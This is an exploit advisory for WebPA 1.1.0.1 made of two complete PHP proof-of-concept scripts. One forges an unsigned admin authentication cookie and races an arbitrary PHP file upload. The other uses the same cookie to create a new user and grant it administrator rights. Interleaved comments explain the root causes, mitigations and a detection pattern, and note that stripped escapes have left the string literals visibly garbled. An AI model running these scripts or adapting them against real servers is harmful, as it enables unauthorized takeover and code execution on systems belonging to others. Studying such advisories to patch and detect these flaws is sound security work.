
# Title : WebPA <= 1.1.0.1 Multiple Vulnerabilities
# Published : 2012-08-24
# Author :
# Previous Title : web@all CMS 2.0 Multiple Vulnerabilities
# Next Title : vlinks 2.0.3 (site.php id parameter) SQL Injection


  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun  posdub[at]gmail.com ]
   [ 2012-08-23                              ]
 ##################################################
 # [ WebPA <= 1.1.0.1 ] Multiple Vulnerabilities  #
 ##################################################
 #
 # Script: "WebPA is an open source online peer assessment tool that enables
 #          every team member to recognise individual contributions to group work."
 #
 # Vendor:   http://www.webpaproject.com/
 # Download: http://sourceforge.net/projects/webpa/files/webpa/
 # Exploits were tested on:
 # Windows (Apache 2.2.17 + php 5.2.17)
 # Linux Centos (Apache 2.2.3 (CentOS) + php 5.2.17)
 #
 ##################################################
 # [ Arbitrary File Upload ]
 # PoC exploit Code:
 <?php
 // Runtime configuration for the published PoC (kept as-is; see the notes on each line).
 error_reporting(0); // warnings from failed socket reads/writes are hidden, so failures surface only via the polling result
 set_time_limit(0);  // the polling loop further down may run for many requests
 ini_set("default_socket_timeout", 5); // caps the connect wait (and presumably stream reads) at 5 s so a silent host cannot hang the script

 /**
  * Opens a plain TCP socket to $host:$port (no TLS) and writes $headers verbatim.
  * A failed connect terminates the script via die(); on success the open handle is
  * returned and the caller is responsible for closing it (http_recv does so).
  */
 function http_send($host, $port, $headers) {
  $fp = fsockopen($host, $port);
  if (!$fp) die('Connection -> fail');
  fputs($fp, $headers);
  return $fp;
 }

 /**
  * Reads everything from the socket until EOF, closes it, and returns the raw
  * response (status line, headers and body in one string). The whole response is
  * buffered in memory; each fgets() call is bounded by the stream's default_socket_timeout
  * (set to 5 s at the top of this script), not by a total size limit.
  */
 function http_recv($fp) {
  $ret="";
  while (!feof($fp))
   $ret.= fgets($fp, 1024);
  fclose($fp);
  return $ret;
 }

 // Banner and CLI argument check: <host> is the target hostname/IP, <path> the web-root-relative WebPA path.
 // NOTE(review): backslash escapes inside the string literals in this listing appear to have been stripped
 // during extraction; the code is kept byte-for-byte.
 print "n#  WebPA v1.1.0.1 Arbitrary File Upload   #n";
 print "# Discovered by dun  posdub[at]gmail.com #nn";
 if ($argc < 3) {
  print "Usage:   php $argv[0] <host> <path>n";
  print "Example: php $argv[0] localhost /WebPA/n";
  die();
 }

 $host = $argv[1];
 $path = $argv[2];
 $tmp = 'tmp/';            // upload directory under the web root, served by tmp/readfile.php
 $temp_prefix='temp_';     // presumably the prefix the application gives the temporary copy of an upload
 $up_file='phpinfo.php';   // client-chosen filename; the server side evidently does not restrict the extension
 $i=0;
 // preparing cookie for authentication bypass
 // Root cause (defender view): AUTH_COOKIE is base64 of "<ts>|<ts>|<serialized user array>" with no signature,
 // so any client can assert user_id/admin. Mitigation: keep authorization state server-side, or sign the cookie
 // with an HMAC and verify it with hash_equals() before trusting (let alone unserializing) its contents.
 $cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array('user_id'=> '1', 'admin'=> '1')));
 // preparing POST data to perform the maximum delay before deleting temporary php file
 $payload = "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="uploadedfile"; filename="%s"rn";
 $payload .= "Content-Type: text/plainrnrn";
 $payload .= "<?php fwrite(fopen('%s','w'),'<?php phpinfo(); ?>'); ?>!".str_repeat("A",40)."rn";
 // making max lag, before unlink
 $payload .= str_repeat(str_repeat("A!",1)."!".str_repeat("A!",4)."rn",1000)."rn"; 
 $payload .= "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="rdoFileContentType"rnrn";
 $payload .= "2rn";
 $payload .= "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="rdoFileSeperator"rnrn";
 $payload .= "!rn";
 $payload .= "-----------------------------187161971819895--rn";
 // Mitigation for the upload path: store uploads outside the web root under a server-generated name, validate
 // the extension/content type server-side, and never leave a temporary copy reachable by URL while it is parsed.
 $headers = "POST {$path}{$tmp}readfile.php HTTP/1.1rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closern";
 $headers .= "Cookie: AUTH_COOKIE={$cookie}rn";
 $headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895rn";
 $headers .= "Content-Length: ".strlen($payload)."rnrn";
 $headers .= sprintf($payload, $temp_prefix.$up_file, $up_file);
 fclose(http_send($host, 80, $headers)); // response is discarded; only the follow-up GETs decide success
 // Detection: a multipart POST to tmp/readfile.php carrying a .php filename, followed by a burst of GETs for
 // tmp/temp_* from the same client, is the observable pattern of this PoC.
 $headers = "GET {$path}{$tmp}%s HTTP/1.0rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closernrn";

 // Polls for the temporary copy up to 999 times; $i reaches 1000 only if every response matched "404 Not Found".
 while(++$i<1000) {
    $res=http_recv(http_send($host, 80, sprintf($headers, $temp_prefix.$up_file)));
    if(!preg_match('/404 Not Found/',$res)) {
     $res=http_recv(http_send($host, 80, sprintf($headers, $up_file)));
      if(preg_match('/200 OK/',$res))
        print "Success!nnUploaded file: http://{$host}{$path}{$tmp}{$up_file}n";
      break;
    }
 }
 if($i==1000) print "Failed.n";
 ?>
 #
 ##################################################
 # [ Arbitrary Add Admin ]
 # PoC exploit Code:
 <?php
 // Runtime configuration for the published PoC (kept as-is; see the notes on each line).
 error_reporting(0); // warnings from failed socket reads/writes and from max() on an empty array are hidden
 set_time_limit(0);  // the script issues several sequential requests with sleep() calls in between
 ini_set("default_socket_timeout", 5); // caps the connect wait (and presumably stream reads) at 5 s so a silent host cannot hang the script

 /**
  * Opens a plain TCP socket to $host:$port (no TLS) and writes $headers verbatim.
  * A failed connect terminates the script via die(); on success the open handle is
  * returned and the caller is responsible for closing it (http_recv does so).
  */
 function http_send($host, $port, $headers) {
  $fp = fsockopen($host, $port);
  if (!$fp) die('Connection -> fail');
  fputs($fp, $headers);
  return $fp;
 }

 /**
  * Reads everything from the socket until EOF, closes it, and returns the raw
  * response (status line, headers and body in one string). The whole response is
  * buffered in memory; each fgets() call is bounded by the stream's default_socket_timeout
  * (set to 5 s at the top of this script), not by a total size limit.
  */
 function http_recv($fp) {
  $ret="";
  while (!feof($fp))
   $ret.= fgets($fp, 1024);
  fclose($fp);
  return $ret;
 }

 // Banner and CLI argument check: <host>, <path> as in the upload PoC, plus the credentials for the account to create.
 // NOTE(review): backslash escapes inside the string literals in this listing appear to have been stripped
 // during extraction; the code is kept byte-for-byte.
 print "n# WebPA v1.1.0.1 Arbitrary Add Admin Exploit #n";
 print "# Discovered by dun    posdub[at]gmail.com  #nn";
 if ($argc < 5) {
  print "Usage:   php $argv[0] <host> <path> username passwordn";
  print "Example: php $argv[0] localhost /WebPA/ foo barn";
  die();
 }

 $host = $argv[1];
 $path = $argv[2];
 $newuser = $argv[3];
 $newpass = $argv[4];
 // Same forged AUTH_COOKIE as the upload PoC: base64 of "<ts>|<ts>|<serialized user array>" with no signature.
 // Mitigation: keep authorization state server-side, or sign the cookie with an HMAC and verify it with
 // hash_equals() before trusting its contents; the admin pages below are gated only by this value.
 $cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array( 'user_id'=> '1', 'admin'=> '1' )));
 print "Adding a new user [ {$newuser} : {$newpass} ]n";
 // Step 1: CSV user import via admin/load/simple.php (one data row, username and password taken from argv).
 $payload = "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="uploadedfile"; filename="user.csv"rn";
 $payload .= "Content-Type: text/csvrnrn";
 $payload .= "institutional_reference,forename,lastname,email,username,module_code,department_id,course_id,passwordrn";
 $payload .= "1,2,3,4,{$newuser},6,7,8,{$newpass}rnrn";
 $payload .= "-----------------------------187161971819895rn";
 $payload .= "Content-Disposition: form-data; name="rdoFileContentType"rnrn";
 $payload .= "2rn";
 $payload .= "-----------------------------187161971819895--rn";
 $headers = "POST {$path}admin/load/simple.php HTTP/1.1rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closern";
 $headers .= "Cookie: AUTH_COOKIE={$cookie}rn";
 $headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895rn";
 $headers .= "Content-Length: ".strlen($payload)."rnrn";
 $headers .= ($payload);
 fclose(http_send($host, 80, $headers)); // response discarded; the script does not verify the import succeeded
 sleep(2);
 print "Granting admin privileges for user [ {$newuser} ]n";
 // Step 2: scrape numeric user ids from the staff listing and take the largest as the just-created account.
 // That is an inference (newest id is not guaranteed to be the highest), not something the page confirms.
 $headers = "GET {$path}admin/review/staff/index.php HTTP/1.0rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closern";
 $headers .= "Cookie: AUTH_COOKIE={$cookie}rnrn";
 preg_match_all('/php?u=(d+)/',http_recv(http_send($host, 80, $headers)) , $matches);
 // If nothing was scraped, max() of an empty array is false on PHP 5 (warning suppressed above) and throws on PHP 8;
 // either way the script stops here.
 if(!is_numeric(max($matches[1]))) die('Failed.');
 sleep(2);
 // Step 3: re-submit the user edit form with chk_admin=on. Defender view: this POST carries no anti-CSRF token
 // and no server-verifiable identity; if the application accepts it, role changes need an authenticated admin
 // session plus CSRF protection, and the scraped-id edit page should not be reachable on the forged cookie.
 $payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=".urlencode('Save Changes');
 $headers = "POST {$path}admin/edit/index.php?u=".max($matches[1])." HTTP/1.0rn";
 $headers .= "Host: {$host}rn";
 $headers .= "Connection: closern";
 $headers .= "Cookie: AUTH_COOKIE={$cookie}rn";
 $headers .= "Content-Type: application/x-www-form-urlencodedrn";
 $headers .= "Content-Length: ".strlen($payload)."rnrn";
 $headers .= ($payload);
 fclose(http_send($host, 80, $headers)); // response discarded; "Success!" below is printed unconditionally
 print "Success!nn";
 print "http://{$host}{$path}login.phpn";
 print "user: {$newuser}n";
 print "pass: {$newpass}n";
 ?>
 #
 ### [ dun / 2012 ] ###############################